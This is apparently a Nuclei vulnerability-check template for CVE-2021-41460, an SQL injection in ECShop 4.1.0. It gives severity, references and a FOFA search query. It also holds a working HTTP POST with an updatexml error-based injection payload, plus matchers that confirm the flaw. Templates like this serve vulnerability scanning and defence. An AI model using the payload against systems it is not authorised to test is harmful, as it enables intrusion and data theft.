id: CVE-2021-41460 info: name: ECShop 4.1.0 - SQL Injection author: SleepingBag945 severity: high description: | ECShop 4.1.0 has SQL injection vulnerability, which can be exploited by attackers to obtain sensitive information. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: | Apply the latest patch or upgrade to a newer version of ECShop to mitigate the SQL Injection vulnerability (CVE-2021-41460). reference: - https://www.cnvd.org.cn/flaw/show/CNVD-2020-58823 - https://nvd.nist.gov/vuln/detail/CVE-2021-41460 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-41460 cwe-id: CWE-89 epss-score: 0.01173 epss-percentile: 0.83438 cpe: cpe:2.3:a:shopex:ecshop:4.1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: shopex product: ecshop fofa-query: product="ECShop" tags: cve2021,cve,cnvd,cnvd2020,ecshop,sqli,shopex variables: num: "999999999" http: - raw: - | POST /delete_cart_goods.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded id=1||(updatexml(1,concat(0x7e,(select%20md5({{num}}))),1)) matchers-condition: and matchers: - type: word part: body words: - 'c8c605999f3d8352d7bb792cf3fdb25' - type: status status: - 200 # digest: 490a00463044022040a989c325626d830471382d264f94e185971d6e03fd399a324d940524daa5a602200501046c648712179c9244ab1af14ecb75143dec5b675818119d735d86e8d3d3:922c64590222798bb761d5b6d8e72950